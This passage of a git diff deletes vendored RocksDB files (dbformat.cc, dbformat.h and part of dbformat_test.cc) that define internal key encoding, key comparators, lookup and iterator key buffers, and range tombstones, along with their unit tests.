-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// kValueTypeForSeek defines the ValueType that should be passed when
-// constructing a ParsedInternalKey object for seeking to a particular
-// sequence number (since we sort sequence numbers in decreasing order
-// and the value type is embedded as the low 8 bits in the sequence
-// number in internal keys, we need to use the highest-numbered
-// ValueType, not the lowest).
-const ValueType kValueTypeForSeek = kTypeBlobIndex;
-const ValueType kValueTypeForSeekForPrev = kTypeDeletion;
-
-uint64_t PackSequenceAndType(uint64_t seq, ValueType t) {
-  assert(seq <= kMaxSequenceNumber);
-  assert(IsExtendedValueType(t));
-  return (seq << 8) | t;
-}
-
-void UnPackSequenceAndType(uint64_t packed, uint64_t* seq, ValueType* t) {
-  *seq = packed >> 8;
-  *t = static_cast<ValueType>(packed & 0xff);
-
-  assert(*seq <= kMaxSequenceNumber);
-  assert(IsExtendedValueType(*t));
-}
-
-void AppendInternalKey(std::string* result, const ParsedInternalKey& key) {
-  result->append(key.user_key.data(), key.user_key.size());
-  PutFixed64(result, PackSequenceAndType(key.sequence, key.type));
-}
-
-void AppendInternalKeyFooter(std::string* result, SequenceNumber s,
-                             ValueType t) {
-  PutFixed64(result, PackSequenceAndType(s, t));
-}
-
-std::string ParsedInternalKey::DebugString(bool hex) const {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "' seq:%" PRIu64 ", type:%d", sequence,
-           static_cast<int>(type));
-  std::string result = "'";
-  result += user_key.ToString(hex);
-  result += buf;
-  return result;
-}
-
-std::string InternalKey::DebugString(bool hex) const {
-  std::string result;
-  ParsedInternalKey parsed;
-  if (ParseInternalKey(rep_, &parsed)) {
-    result = parsed.DebugString(hex);
-  } else {
-    result = "(bad)";
-    result.append(EscapeString(rep_));
-  }
-  return result;
-}
-
-const char* InternalKeyComparator::Name() const {
-  return name_.c_str();
-}
-
-int InternalKeyComparator::Compare(const Slice& akey, const Slice& bkey) const {
-  // Order by:
-  //    increasing user key (according to user-supplied comparator)
-  //    decreasing sequence number
-  //    decreasing type (though sequence# should be enough to disambiguate)
-  int r = user_comparator_->Compare(ExtractUserKey(akey), ExtractUserKey(bkey));
-  PERF_COUNTER_ADD(user_key_comparison_count, 1);
-  if (r == 0) {
-    const uint64_t anum = DecodeFixed64(akey.data() + akey.size() - 8);
-    const uint64_t bnum = DecodeFixed64(bkey.data() + bkey.size() - 8);
-    if (anum > bnum) {
-      r = -1;
-    } else if (anum < bnum) {
-      r = +1;
-    }
-  }
-  return r;
-}
-
-int InternalKeyComparator::Compare(const ParsedInternalKey& a,
-                                   const ParsedInternalKey& b) const {
-  // Order by:
-  //    increasing user key (according to user-supplied comparator)
-  //    decreasing sequence number
-  //    decreasing type (though sequence# should be enough to disambiguate)
-  int r = user_comparator_->Compare(a.user_key, b.user_key);
-  PERF_COUNTER_ADD(user_key_comparison_count, 1);
-  if (r == 0) {
-    if (a.sequence > b.sequence) {
-      r = -1;
-    } else if (a.sequence < b.sequence) {
-      r = +1;
-    } else if (a.type > b.type) {
-      r = -1;
-    } else if (a.type < b.type) {
-      r = +1;
-    }
-  }
-  return r;
-}
-
-void InternalKeyComparator::FindShortestSeparator(
-      std::string* start,
-      const Slice& limit) const {
-  // Attempt to shorten the user portion of the key
-  Slice user_start = ExtractUserKey(*start);
-  Slice user_limit = ExtractUserKey(limit);
-  std::string tmp(user_start.data(), user_start.size());
-  user_comparator_->FindShortestSeparator(&tmp, user_limit);
-  if (tmp.size() <= user_start.size() &&
-      user_comparator_->Compare(user_start, tmp) < 0) {
-    // User key has become shorter physically, but larger logically.
-    // Tack on the earliest possible number to the shortened user key.
-    PutFixed64(&tmp, PackSequenceAndType(kMaxSequenceNumber,kValueTypeForSeek));
-    assert(this->Compare(*start, tmp) < 0);
-    assert(this->Compare(tmp, limit) < 0);
-    start->swap(tmp);
-  }
-}
-
-void InternalKeyComparator::FindShortSuccessor(std::string* key) const {
-  Slice user_key = ExtractUserKey(*key);
-  std::string tmp(user_key.data(), user_key.size());
-  user_comparator_->FindShortSuccessor(&tmp);
-  if (tmp.size() <= user_key.size() &&
-      user_comparator_->Compare(user_key, tmp) < 0) {
-    // User key has become shorter physically, but larger logically.
-    // Tack on the earliest possible number to the shortened user key.
-    PutFixed64(&tmp, PackSequenceAndType(kMaxSequenceNumber,kValueTypeForSeek));
-    assert(this->Compare(*key, tmp) < 0);
-    key->swap(tmp);
-  }
-}
-
-LookupKey::LookupKey(const Slice& _user_key, SequenceNumber s) {
-  size_t usize = _user_key.size();
-  size_t needed = usize + 13;  // A conservative estimate
-  char* dst;
-  if (needed <= sizeof(space_)) {
-    dst = space_;
-  } else {
-    dst = new char[needed];
-  }
-  start_ = dst;
-  // NOTE: We don't support users keys of more than 2GB :)
-  dst = EncodeVarint32(dst, static_cast<uint32_t>(usize + 8));
-  kstart_ = dst;
-  memcpy(dst, _user_key.data(), usize);
-  dst += usize;
-  EncodeFixed64(dst, PackSequenceAndType(s, kValueTypeForSeek));
-  dst += 8;
-  end_ = dst;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/dbformat.h b/thirdparty/rocksdb/db/dbformat.h
deleted file mode 100644
index c58b836..0000000
--- a/thirdparty/rocksdb/db/dbformat.h
+++ /dev/null
@@ -1,598 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdio.h>
-#include <string>
-#include <utility>
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/types.h"
-#include "util/coding.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-class InternalKey;
-
-// Value types encoded as the last component of internal keys.
-// DO NOT CHANGE THESE ENUM VALUES: they are embedded in the on-disk
-// data structures.
-// The highest bit of the value type needs to be reserved to SST tables
-// for them to do more flexible encoding.
-enum ValueType : unsigned char {
-  kTypeDeletion = 0x0,
-  kTypeValue = 0x1,
-  kTypeMerge = 0x2,
-  kTypeLogData = 0x3,               // WAL only.
-  kTypeColumnFamilyDeletion = 0x4,  // WAL only.
-  kTypeColumnFamilyValue = 0x5,     // WAL only.
-  kTypeColumnFamilyMerge = 0x6,     // WAL only.
-  kTypeSingleDeletion = 0x7,
-  kTypeColumnFamilySingleDeletion = 0x8,  // WAL only.
-  kTypeBeginPrepareXID = 0x9,             // WAL only.
-  kTypeEndPrepareXID = 0xA,               // WAL only.
-  kTypeCommitXID = 0xB,                   // WAL only.
-  kTypeRollbackXID = 0xC,                 // WAL only.
-  kTypeNoop = 0xD,                        // WAL only.
-  kTypeColumnFamilyRangeDeletion = 0xE,   // WAL only.
-  kTypeRangeDeletion = 0xF,               // meta block
-  kTypeColumnFamilyBlobIndex = 0x10,      // Blob DB only
-  kTypeBlobIndex = 0x11,                  // Blob DB only
-  kMaxValue = 0x7F                        // Not used for storing records.
-};
-
-// Defined in dbformat.cc
-extern const ValueType kValueTypeForSeek;
-extern const ValueType kValueTypeForSeekForPrev;
-
-// Checks whether a type is an inline value type
-// (i.e. a type used in memtable skiplist and sst file datablock).
-inline bool IsValueType(ValueType t) {
-  return t <= kTypeMerge || t == kTypeSingleDeletion || t == kTypeBlobIndex;
-}
-
-// Checks whether a type is from user operation
-// kTypeRangeDeletion is in meta block so this API is separated from above
-inline bool IsExtendedValueType(ValueType t) {
-  return IsValueType(t) || t == kTypeRangeDeletion;
-}
-
-// We leave eight bits empty at the bottom so a type and sequence#
-// can be packed together into 64-bits.
-static const SequenceNumber kMaxSequenceNumber =
-    ((0x1ull << 56) - 1);
-
-static const SequenceNumber kDisableGlobalSequenceNumber = port::kMaxUint64;
-
-struct ParsedInternalKey {
-  Slice user_key;
-  SequenceNumber sequence;
-  ValueType type;
-
-  ParsedInternalKey()
-      : sequence(kMaxSequenceNumber)  // Make code analyzer happy
-  {}  // Intentionally left uninitialized (for speed)
-  ParsedInternalKey(const Slice& u, const SequenceNumber& seq, ValueType t)
-      : user_key(u), sequence(seq), type(t) { }
-  std::string DebugString(bool hex = false) const;
-
-  void clear() {
-    user_key.clear();
-    sequence = 0;
-    type = kTypeDeletion;
-  }
-};
-
-// Return the length of the encoding of "key".
-inline size_t InternalKeyEncodingLength(const ParsedInternalKey& key) {
-  return key.user_key.size() + 8;
-}
-
-// Pack a sequence number and a ValueType into a uint64_t
-extern uint64_t PackSequenceAndType(uint64_t seq, ValueType t);
-
-// Given the result of PackSequenceAndType, store the sequence number in *seq
-// and the ValueType in *t.
-extern void UnPackSequenceAndType(uint64_t packed, uint64_t* seq, ValueType* t);
-
-// Append the serialization of "key" to *result.
-extern void AppendInternalKey(std::string* result,
-                              const ParsedInternalKey& key);
-// Serialized internal key consists of user key followed by footer.
-// This function appends the footer to *result, assuming that *result already
-// contains the user key at the end.
-extern void AppendInternalKeyFooter(std::string* result, SequenceNumber s,
-                                    ValueType t);
-
-// Attempt to parse an internal key from "internal_key".  On success,
-// stores the parsed data in "*result", and returns true.
-//
-// On error, returns false, leaves "*result" in an undefined state.
-extern bool ParseInternalKey(const Slice& internal_key,
-                             ParsedInternalKey* result);
-
-// Returns the user key portion of an internal key.
-inline Slice ExtractUserKey(const Slice& internal_key) {
-  assert(internal_key.size() >= 8);
-  return Slice(internal_key.data(), internal_key.size() - 8);
-}
-
-inline ValueType ExtractValueType(const Slice& internal_key) {
-  assert(internal_key.size() >= 8);
-  const size_t n = internal_key.size();
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  unsigned char c = num & 0xff;
-  return static_cast<ValueType>(c);
-}
-
-// A comparator for internal keys that uses a specified comparator for
-// the user key portion and breaks ties by decreasing sequence number.
-class InternalKeyComparator : public Comparator {
- private:
-  const Comparator* user_comparator_;
-  std::string name_;
- public:
-  explicit InternalKeyComparator(const Comparator* c) : user_comparator_(c),
-    name_("rocksdb.InternalKeyComparator:" +
-          std::string(user_comparator_->Name())) {
-  }
-  virtual ~InternalKeyComparator() {}
-
-  virtual const char* Name() const override;
-  virtual int Compare(const Slice& a, const Slice& b) const override;
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override;
-  virtual void FindShortSuccessor(std::string* key) const override;
-
-  const Comparator* user_comparator() const { return user_comparator_; }
-
-  int Compare(const InternalKey& a, const InternalKey& b) const;
-  int Compare(const ParsedInternalKey& a, const ParsedInternalKey& b) const;
-  virtual const Comparator* GetRootComparator() const override {
-    return user_comparator_->GetRootComparator();
-  }
-};
-
-// Modules in this directory should keep internal keys wrapped inside
-// the following class instead of plain strings so that we do not
-// incorrectly use string comparisons instead of an InternalKeyComparator.
-class InternalKey {
- private:
-  std::string rep_;
- public:
-  InternalKey() { }   // Leave rep_ as empty to indicate it is invalid
-  InternalKey(const Slice& _user_key, SequenceNumber s, ValueType t) {
-    AppendInternalKey(&rep_, ParsedInternalKey(_user_key, s, t));
-  }
-
-  // sets the internal key to be bigger or equal to all internal keys with this
-  // user key
-  void SetMaxPossibleForUserKey(const Slice& _user_key) {
-    AppendInternalKey(&rep_, ParsedInternalKey(_user_key, kMaxSequenceNumber,
-                                               kValueTypeForSeek));
-  }
-
-  // sets the internal key to be smaller or equal to all internal keys with this
-  // user key
-  void SetMinPossibleForUserKey(const Slice& _user_key) {
-    AppendInternalKey(
-        &rep_, ParsedInternalKey(_user_key, 0, static_cast<ValueType>(0)));
-  }
-
-  bool Valid() const {
-    ParsedInternalKey parsed;
-    return ParseInternalKey(Slice(rep_), &parsed);
-  }
-
-  void DecodeFrom(const Slice& s) { rep_.assign(s.data(), s.size()); }
-  Slice Encode() const {
-    assert(!rep_.empty());
-    return rep_;
-  }
-
-  Slice user_key() const { return ExtractUserKey(rep_); }
-  size_t size() { return rep_.size(); }
-
-  void Set(const Slice& _user_key, SequenceNumber s, ValueType t) {
-    SetFrom(ParsedInternalKey(_user_key, s, t));
-  }
-
-  void SetFrom(const ParsedInternalKey& p) {
-    rep_.clear();
-    AppendInternalKey(&rep_, p);
-  }
-
-  void Clear() { rep_.clear(); }
-
-  // The underlying representation.
-  // Intended only to be used together with ConvertFromUserKey().
-  std::string* rep() { return &rep_; }
-
-  // Assuming that *rep() contains a user key, this method makes internal key
-  // out of it in-place. This saves a memcpy compared to Set()/SetFrom().
-  void ConvertFromUserKey(SequenceNumber s, ValueType t) {
-    AppendInternalKeyFooter(&rep_, s, t);
-  }
-
-  std::string DebugString(bool hex = false) const;
-};
-
-inline int InternalKeyComparator::Compare(
-    const InternalKey& a, const InternalKey& b) const {
-  return Compare(a.Encode(), b.Encode());
-}
-
-inline bool ParseInternalKey(const Slice& internal_key,
-                             ParsedInternalKey* result) {
-  const size_t n = internal_key.size();
-  if (n < 8) return false;
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  unsigned char c = num & 0xff;
-  result->sequence = num >> 8;
-  result->type = static_cast<ValueType>(c);
-  assert(result->type <= ValueType::kMaxValue);
-  result->user_key = Slice(internal_key.data(), n - 8);
-  return IsExtendedValueType(result->type);
-}
-
-// Update the sequence number in the internal key.
-// Guarantees not to invalidate ikey.data().
-inline void UpdateInternalKey(std::string* ikey, uint64_t seq, ValueType t) {
-  size_t ikey_sz = ikey->size();
-  assert(ikey_sz >= 8);
-  uint64_t newval = (seq << 8) | t;
-
-  // Note: Since C++11, strings are guaranteed to be stored contiguously and
-  // string::operator[]() is guaranteed not to change ikey.data().
-  EncodeFixed64(&(*ikey)[ikey_sz - 8], newval);
-}
-
-// Get the sequence number from the internal key
-inline uint64_t GetInternalKeySeqno(const Slice& internal_key) {
-  const size_t n = internal_key.size();
-  assert(n >= 8);
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  return num >> 8;
-}
-
-
-// A helper class useful for DBImpl::Get()
-class LookupKey {
- public:
-  // Initialize *this for looking up user_key at a snapshot with
-  // the specified sequence number.
-  LookupKey(const Slice& _user_key, SequenceNumber sequence);
-
-  ~LookupKey();
-
-  // Return a key suitable for lookup in a MemTable.
-  Slice memtable_key() const {
-    return Slice(start_, static_cast<size_t>(end_ - start_));
-  }
-
-  // Return an internal key (suitable for passing to an internal iterator)
-  Slice internal_key() const {
-    return Slice(kstart_, static_cast<size_t>(end_ - kstart_));
-  }
-
-  // Return the user key
-  Slice user_key() const {
-    return Slice(kstart_, static_cast<size_t>(end_ - kstart_ - 8));
-  }
-
- private:
-  // We construct a char array of the form:
-  //    klength  varint32               <-- start_
-  //    userkey  char[klength]          <-- kstart_
-  //    tag      uint64
-  //                                    <-- end_
-  // The array is a suitable MemTable key.
-  // The suffix starting with "userkey" can be used as an InternalKey.
-  const char* start_;
-  const char* kstart_;
-  const char* end_;
-  char space_[200];      // Avoid allocation for short keys
-
-  // No copying allowed
-  LookupKey(const LookupKey&);
-  void operator=(const LookupKey&);
-};
-
-inline LookupKey::~LookupKey() {
-  if (start_ != space_) delete[] start_;
-}
-
-class IterKey {
- public:
-  IterKey()
-      : buf_(space_),
-        buf_size_(sizeof(space_)),
-        key_(buf_),
-        key_size_(0),
-        is_user_key_(true) {}
-
-  ~IterKey() { ResetBuffer(); }
-
-  Slice GetInternalKey() const {
-    assert(!IsUserKey());
-    return Slice(key_, key_size_);
-  }
-
-  Slice GetUserKey() const {
-    if (IsUserKey()) {
-      return Slice(key_, key_size_);
-    } else {
-      assert(key_size_ >= 8);
-      return Slice(key_, key_size_ - 8);
-    }
-  }
-
-  size_t Size() const { return key_size_; }
-
-  void Clear() { key_size_ = 0; }
-
-  // Append "non_shared_data" to its back, from "shared_len"
-  // This function is used in Block::Iter::ParseNextKey
-  // shared_len: bytes in [0, shard_len-1] would be remained
-  // non_shared_data: data to be append, its length must be >= non_shared_len
-  void TrimAppend(const size_t shared_len, const char* non_shared_data,
-                  const size_t non_shared_len) {
-    assert(shared_len <= key_size_);
-    size_t total_size = shared_len + non_shared_len;
-
-    if (IsKeyPinned() /* key is not in buf_ */) {
-      // Copy the key from external memory to buf_ (copy shared_len bytes)
-      EnlargeBufferIfNeeded(total_size);
-      memcpy(buf_, key_, shared_len);
-    } else if (total_size > buf_size_) {
-      // Need to allocate space, delete previous space
-      char* p = new char[total_size];
-      memcpy(p, key_, shared_len);
-
-      if (buf_ != space_) {
-        delete[] buf_;
-      }
-
-      buf_ = p;
-      buf_size_ = total_size;
-    }
-
-    memcpy(buf_ + shared_len, non_shared_data, non_shared_len);
-    key_ = buf_;
-    key_size_ = total_size;
-  }
-
-  Slice SetUserKey(const Slice& key, bool copy = true) {
-    is_user_key_ = true;
-    return SetKeyImpl(key, copy);
-  }
-
-  Slice SetInternalKey(const Slice& key, bool copy = true) {
-    is_user_key_ = false;
-    return SetKeyImpl(key, copy);
-  }
-
-  // Copies the content of key, updates the reference to the user key in ikey
-  // and returns a Slice referencing the new copy.
-  Slice SetInternalKey(const Slice& key, ParsedInternalKey* ikey) {
-    size_t key_n = key.size();
-    assert(key_n >= 8);
-    SetInternalKey(key);
-    ikey->user_key = Slice(key_, key_n - 8);
-    return Slice(key_, key_n);
-  }
-
-  // Copy the key into IterKey own buf_
-  void OwnKey() {
-    assert(IsKeyPinned() == true);
-
-    Reserve(key_size_);
-    memcpy(buf_, key_, key_size_);
-    key_ = buf_;
-  }
-
-  // Update the sequence number in the internal key.  Guarantees not to
-  // invalidate slices to the key (and the user key).
-  void UpdateInternalKey(uint64_t seq, ValueType t) {
-    assert(!IsKeyPinned());
-    assert(key_size_ >= 8);
-    uint64_t newval = (seq << 8) | t;
-    EncodeFixed64(&buf_[key_size_ - 8], newval);
-  }
-
-  bool IsKeyPinned() const { return (key_ != buf_); }
-
-  void SetInternalKey(const Slice& key_prefix, const Slice& user_key,
-                      SequenceNumber s,
-                      ValueType value_type = kValueTypeForSeek) {
-    size_t psize = key_prefix.size();
-    size_t usize = user_key.size();
-    EnlargeBufferIfNeeded(psize + usize + sizeof(uint64_t));
-    if (psize > 0) {
-      memcpy(buf_, key_prefix.data(), psize);
-    }
-    memcpy(buf_ + psize, user_key.data(), usize);
-    EncodeFixed64(buf_ + usize + psize, PackSequenceAndType(s, value_type));
-
-    key_ = buf_;
-    key_size_ = psize + usize + sizeof(uint64_t);
-    is_user_key_ = false;
-  }
-
-  void SetInternalKey(const Slice& user_key, SequenceNumber s,
-                      ValueType value_type = kValueTypeForSeek) {
-    SetInternalKey(Slice(), user_key, s, value_type);
-  }
-
-  void Reserve(size_t size) {
-    EnlargeBufferIfNeeded(size);
-    key_size_ = size;
-  }
-
-  void SetInternalKey(const ParsedInternalKey& parsed_key) {
-    SetInternalKey(Slice(), parsed_key);
-  }
-
-  void SetInternalKey(const Slice& key_prefix,
-                      const ParsedInternalKey& parsed_key_suffix) {
-    SetInternalKey(key_prefix, parsed_key_suffix.user_key,
-                   parsed_key_suffix.sequence, parsed_key_suffix.type);
-  }
-
-  void EncodeLengthPrefixedKey(const Slice& key) {
-    auto size = key.size();
-    EnlargeBufferIfNeeded(size + static_cast<size_t>(VarintLength(size)));
-    char* ptr = EncodeVarint32(buf_, static_cast<uint32_t>(size));
-    memcpy(ptr, key.data(), size);
-    key_ = buf_;
-    is_user_key_ = true;
-  }
-
-  bool IsUserKey() const { return is_user_key_; }
-
- private:
-  char* buf_;
-  size_t buf_size_;
-  const char* key_;
-  size_t key_size_;
-  char space_[32];  // Avoid allocation for short keys
-  bool is_user_key_;
-
-  Slice SetKeyImpl(const Slice& key, bool copy) {
-    size_t size = key.size();
-    if (copy) {
-      // Copy key to buf_
-      EnlargeBufferIfNeeded(size);
-      memcpy(buf_, key.data(), size);
-      key_ = buf_;
-    } else {
-      // Update key_ to point to external memory
-      key_ = key.data();
-    }
-    key_size_ = size;
-    return Slice(key_, key_size_);
-  }
-
-  void ResetBuffer() {
-    if (buf_ != space_) {
-      delete[] buf_;
-      buf_ = space_;
-    }
-    buf_size_ = sizeof(space_);
-    key_size_ = 0;
-  }
-
-  // Enlarge the buffer size if needed based on key_size.
-  // By default, static allocated buffer is used. Once there is a key
-  // larger than the static allocated buffer, another buffer is dynamically
-  // allocated, until a larger key buffer is requested. In that case, we
-  // reallocate buffer and delete the old one.
-  void EnlargeBufferIfNeeded(size_t key_size) {
-    // If size is smaller than buffer size, continue using current buffer,
-    // or the static allocated one, as default
-    if (key_size > buf_size_) {
-      // Need to enlarge the buffer.
-      ResetBuffer();
-      buf_ = new char[key_size];
-      buf_size_ = key_size;
-    }
-  }
-
-  // No copying allowed
-  IterKey(const IterKey&) = delete;
-  void operator=(const IterKey&) = delete;
-};
-
-class InternalKeySliceTransform : public SliceTransform {
- public:
-  explicit InternalKeySliceTransform(const SliceTransform* transform)
-      : transform_(transform) {}
-
-  virtual const char* Name() const override { return transform_->Name(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    auto user_key = ExtractUserKey(src);
-    return transform_->Transform(user_key);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    auto user_key = ExtractUserKey(src);
-    return transform_->InDomain(user_key);
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    auto user_key = ExtractUserKey(dst);
-    return transform_->InRange(user_key);
-  }
-
-  const SliceTransform* user_prefix_extractor() const { return transform_; }
-
- private:
-  // Like comparator, InternalKeySliceTransform will not take care of the
-  // deletion of transform_
-  const SliceTransform* const transform_;
-};
-
-// Read the key of a record from a write batch.
-// if this record represent the default column family then cf_record
-// must be passed as false, otherwise it must be passed as true.
-extern bool ReadKeyFromWriteBatchEntry(Slice* input, Slice* key,
-                                       bool cf_record);
-
-// Read record from a write batch piece from input.
-// tag, column_family, key, value and blob are return values. Callers own the
-// Slice they point to.
-// Tag is defined as ValueType.
-// input will be advanced to after the record.
-extern Status ReadRecordFromWriteBatch(Slice* input, char* tag,
-                                       uint32_t* column_family, Slice* key,
-                                       Slice* value, Slice* blob, Slice* xid);
-
-// When user call DeleteRange() to delete a range of keys,
-// we will store a serialized RangeTombstone in MemTable and SST.
-// the struct here is a easy-understood form
-// start/end_key_ is the start/end user key of the range to be deleted
-struct RangeTombstone {
-  Slice start_key_;
-  Slice end_key_;
-  SequenceNumber seq_;
-  RangeTombstone() = default;
-  RangeTombstone(Slice sk, Slice ek, SequenceNumber sn)
-      : start_key_(sk), end_key_(ek), seq_(sn) {}
-
-  RangeTombstone(ParsedInternalKey parsed_key, Slice value) {
-    start_key_ = parsed_key.user_key;
-    seq_ = parsed_key.sequence;
-    end_key_ = value;
-  }
-
-  // be careful to use Serialize(), allocates new memory
-  std::pair<InternalKey, Slice> Serialize() const {
-    auto key = InternalKey(start_key_, seq_, kTypeRangeDeletion);
-    Slice value = end_key_;
-    return std::make_pair(std::move(key), std::move(value));
-  }
-
-  // be careful to use SerializeKey(), allocates new memory
-  InternalKey SerializeKey() const {
-    return InternalKey(start_key_, seq_, kTypeRangeDeletion);
-  }
-
-  // be careful to use SerializeEndKey(), allocates new memory
-  InternalKey SerializeEndKey() const {
-    return InternalKey(end_key_, seq_, kTypeRangeDeletion);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/dbformat_test.cc b/thirdparty/rocksdb/db/dbformat_test.cc
deleted file mode 100644
index d96b575..0000000
--- a/thirdparty/rocksdb/db/dbformat_test.cc
+++ /dev/null
@@ -1,200 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/dbformat.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static std::string IKey(const std::string& user_key,
-                        uint64_t seq,
-                        ValueType vt) {
-  std::string encoded;
-  AppendInternalKey(&encoded, ParsedInternalKey(user_key, seq, vt));
-  return encoded;
-}
-
-static std::string Shorten(const std::string& s, const std::string& l) {
-  std::string result = s;
-  InternalKeyComparator(BytewiseComparator()).FindShortestSeparator(&result, l);
-  return result;
-}
-
-static std::string ShortSuccessor(const std::string& s) {
-  std::string result = s;
-  InternalKeyComparator(BytewiseComparator()).FindShortSuccessor(&result);
-  return result;
-}
-
-static void TestKey(const std::string& key,
-                    uint64_t seq,
-                    ValueType vt) {
-  std::string encoded = IKey(key, seq, vt);
-
-  Slice in(encoded);
-  ParsedInternalKey decoded("", 0, kTypeValue);
-
-  ASSERT_TRUE(ParseInternalKey(in, &decoded));
-  ASSERT_EQ(key, decoded.user_key.ToString());
-  ASSERT_EQ(seq, decoded.sequence);
-  ASSERT_EQ(vt, decoded.type);
-
-  ASSERT_TRUE(!ParseInternalKey(Slice("bar"), &decoded));
-}
-
-class FormatTest : public testing::Test {};
-
-TEST_F(FormatTest, InternalKey_EncodeDecode) {
-  const char* keys[] = { "", "k", "hello", "longggggggggggggggggggggg" };
-  const uint64_t seq[] = {
-    1, 2, 3,
-    (1ull << 8) - 1, 1ull << 8, (1ull << 8) + 1,
-    (1ull << 16) - 1, 1ull << 16, (1ull << 16) + 1,
-    (1ull << 32) - 1, 1ull << 32, (1ull << 32) + 1
-  };
-  for (unsigned int k = 0; k < sizeof(keys) / sizeof(keys[0]); k++) {
-    for (unsigned int s = 0; s < sizeof(seq) / sizeof(seq[0]); s++) {
-      TestKey(keys[k], seq[s], kTypeValue);
-      TestKey("hello", 1, kTypeDeletion);
-    }
-  }
-}
-
-TEST_F(FormatTest, InternalKeyShortSeparator) {
-  // When user keys are same
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 99, kTypeValue)));
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 101, kTypeValue)));
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 100, kTypeValue)));
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 100, kTypeDeletion)));
-
-  // When user keys are misordered
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("bar", 99, kTypeValue)));
-
-  // When user keys are different, but correctly ordered
-  ASSERT_EQ(IKey("g", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("hello", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("ABC2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("ABC1AAAAA", 100, kTypeValue),
-                    IKey("ABC2ABB", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("AAA1AAA", 100, kTypeValue),
-                    IKey("AAA2AA", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-      Shorten(IKey("AAA1AAA", 100, kTypeValue), IKey("AAA4", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA1B", kMaxSequenceNumber, kValueTypeForSeek),
-      Shorten(IKey("AAA1AAA", 100, kTypeValue), IKey("AAA2", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("AAA1AAA", 100, kTypeValue),
-                    IKey("AAA2A", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA1", 100, kTypeValue),
-      Shorten(IKey("AAA1", 100, kTypeValue), IKey("AAA2", 200, kTypeValue)));
-
-  // When start user key is prefix of limit user key
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foobar", 200, kTypeValue)));
-
-  // When limit user key is prefix of start user key
-  ASSERT_EQ(IKey("foobar", 100, kTypeValue),
-            Shorten(IKey("foobar", 100, kTypeValue),
-                    IKey("foo", 200, kTypeValue)));
-}
-
-TEST_F(FormatTest, InternalKeyShortestSuccessor) {
-  ASSERT_EQ(IKey("g", kMaxSequenceNumber, kValueTypeForSeek),
-            ShortSuccessor(IKey("foo", 100, kTypeValue)));
-  ASSERT_EQ(IKey("\xff\xff", 100, kTypeValue),
-            ShortSuccessor(IKey("\xff\xff", 100, kTypeValue)));
-}
-
-TEST_F(FormatTest, IterKeyOperation) {
-  IterKey k;
-  const char p[] = "abcdefghijklmnopqrstuvwxyz";
-  const char q[] = "0123456789";
-
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string(""));
-
-  k.TrimAppend(0, p, 3);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abc"));
-
-  k.TrimAppend(1, p, 3);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("aabc"));
-
-  k.TrimAppend(0, p, 26);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz"));
-
-  k.TrimAppend(26, q, 10);
